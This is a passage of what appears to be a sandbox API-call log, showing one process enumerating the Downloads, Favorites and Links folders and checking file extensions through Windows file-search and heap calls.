out: hHeap=0x6a0000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0186.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0186.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0186.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.779] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0186.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0186.779] PathFindFileNameW (pszPath="") returned="" [0186.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.779] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0186.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.780] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.780] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.780] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini") returned=".ini" [0186.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.781] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.781] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0186.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0186.782] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0186.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0186.782] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0186.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.783] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0186.783] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0186.783] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0186.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.784] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0186.784] PathFindFileNameW (pszPath="") returned="" [0186.784] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0186.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.784] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini") returned=".ini" [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0186.784] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0186.798] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0186.798] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0186.798] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0186.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0186.798] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0186.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.799] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0186.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.799] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0186.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0186.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.799] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0186.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.799] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0186.799] PathFindFileNameW (pszPath="") returned="" [0186.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.799] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0186.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.800] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.800] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.801] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\desktop.ini") returned=".ini" [0186.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.801] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0186.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.802] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk") returned=".lnk" [0186.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.802] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0186.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.803] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk") returned=".lnk" [0186.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.803] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0186.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.803] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk") returned=".lnk" [0186.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.804] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0186.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.804] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk") returned=".lnk" [0186.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.805] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0186.805] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0186.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0186.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0186.806] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0186.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.814] 